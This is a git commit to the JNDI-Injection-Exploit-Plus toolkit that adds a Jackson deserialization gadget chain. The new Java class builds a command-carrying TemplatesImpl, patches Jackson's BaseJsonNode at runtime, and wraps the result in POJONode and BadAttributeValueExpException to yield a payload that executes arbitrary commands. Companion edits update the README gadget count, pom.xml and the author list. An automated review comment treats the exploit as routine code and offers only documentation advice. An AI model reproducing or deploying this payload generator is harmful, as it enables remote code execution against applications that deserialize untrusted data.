
Commit 26d99d6

committed
add jackson
1 parent a1e5101 commit 26d99d6


5 files changed

+59
-3
lines changed


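--- a/README.md
+++ b/README.md
@@ -35,7 +35,7 @@ Groovy (GroovyClassLoader) | @cckuailong | trustURLCodebase is false but have To
 Groovy (GroovyShell) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath
 Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere v6-v9 in classpath
 
-#### 3. Deserailization Gadget (total: 73)
+#### 3. Deserailization Gadget (total: 74)
 
 P.S. More Gadgets (:arrow_up: ) than ysoserial, welcome to PR more! ^_^
 
@@ -78,6 +78,7 @@ FileUpload1 |@mbechler |commons-fileupload:1.3.1, comm
 Groovy1 |@frohoff |groovy:2.3.9
 Hibernate1 |@mbechler|
 Hibernate2 |@mbechler|
+Jackson :arrow_up: |@y4er |com.fasterxml.jackson.core:jackson-databind:2.14.2
 JBossInterceptors1 |@matthias_kaiser |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
 Jdk7u21 |@frohoff|
 JRMPClient1 |@mbechler|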

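--- a/README_zh.md
+++ b/README_zh.md
@@ -12,7 +12,7 @@ JNDI-Injection-Exploit-Plus改写自welk1n大佬的JNDI-Injection-Exploit项目
 
 - 远程Reference链 (3种)
 - 本地Reference链 (4种)
-- 反序列化链(73种
+- 反序列化链(74种
 
 P.S. 具体利用链名称及依赖见 [表格](./README.md)
 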
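--- a/pom.xml
+++ b/pom.xml
@@ -6,7 +6,7 @@
 
 <groupId>cckuailong</groupId>
 <artifactId>JNDI-Injection-Exploit-Plus</artifactId>
-<version>2.1-SNAPSHOT</version>
+<version>2.2-SNAPSHOT</version>
 
 <properties>
 <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
@@ -152,6 +152,12 @@
 <version>4.0</version>
 </dependency>
 
+<dependency>
+<groupId>com.fasterxml.jackson.core</groupId>
+<artifactId>jackson-databind</artifactId>
+<version>2.14.2</version>
+</dependency>
+
 <dependency>
 <groupId>org.aspectj</groupId>
 <artifactId>aspectjweaver</artifactId>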
Lines changed: 48 additions & 0 deletions
@@ -0,0 +1,48 @@
1+
package payloads;
2+
import com.fasterxml.jackson.databind.node.POJONode;
3+
import javassist.ClassPool;
4+
import javassist.CtClass;
5+
import javassist.CtMethod;
6+
import payloads.annotation.Authors;
7+
import payloads.annotation.Dependencies;
8+
import util.Gadgets;
9+
import util.PayloadRunner;
10+
import util.Reflections;
11+
12+
import javax.management.BadAttributeValueExpException;
13+
import java.util.HashMap;
14+
15+
@SuppressWarnings({"rawtypes", "unchecked"})
16+
@Dependencies({"com.fasterxml.jackson.core:jackson-databind:2.14.2"})
17+
@Authors({Authors.Y4ER})
18+
public class Jackson implements ObjectPayload<Object> {
19+
20+
public Object getObject(final String command) throws Exception {
21+
final Object template = Gadgets.createTemplatesImpl(command);
22+
23+
CtClass ctClass = ClassPool.getDefault().get("com.fasterxml.jackson.databind.node.BaseJsonNode");
24+
CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
25+
ctClass.removeMethod(writeReplace);
26+
// 将修改后的CtClass加载至当前线程的上下文类加载器中
27+
ctClass.toClass();
28+
29+
POJONode node = new POJONode(template);
30+
31+
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
32+
Reflections.setFieldValue(badAttributeValueExpException, "val", node);
33+
34+
HashMap hashMap = new HashMap();
35+
hashMap.put(template, badAttributeValueExpException);
36+
37+
return hashMap;
38+
}
39+
40+
41+
public static byte[] getBytes(final String command) throws Exception {
42+
return PayloadRunner.run(Jackson.class, command);
43+
}
44+
45+
public static void main(final String command) throws Exception {
46+
PayloadRunner.run(Jackson.class, command);
47+
}
48+
}
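Review bot: `getObject` modifies a library class at runtime and nothing in the file documents that side effect. The `ctClass.toClass()` call at new line 27 loads a `BaseJsonNode` with `writeReplace` removed through the context class loader, so the change presumably applies to every later Jackson use in the same process, not only to the object returned here. The only comment on it (new line 26) is in Chinese; I would replace it with `// Loads the modified BaseJsonNode via the current thread's context class loader; the change is process-wide, not scoped to this call.` The class and `getObject` also have no Javadoc; a short one should state this side effect and that the class was written against jackson-databind 2.14.2, the version named in `@Dependencies`.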

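--- a/src/main/java/payloads/annotation/Authors.java
+++ b/src/main/java/payloads/annotation/Authors.java
@@ -29,6 +29,7 @@
 String FIREBASKY = "Firebasky";
 String CCKUAILONG = "cckuailong";
 String YULEGEYU = "yulegeyu";
+String Y4ER = "y4er";
 
 String[] value() default {};
 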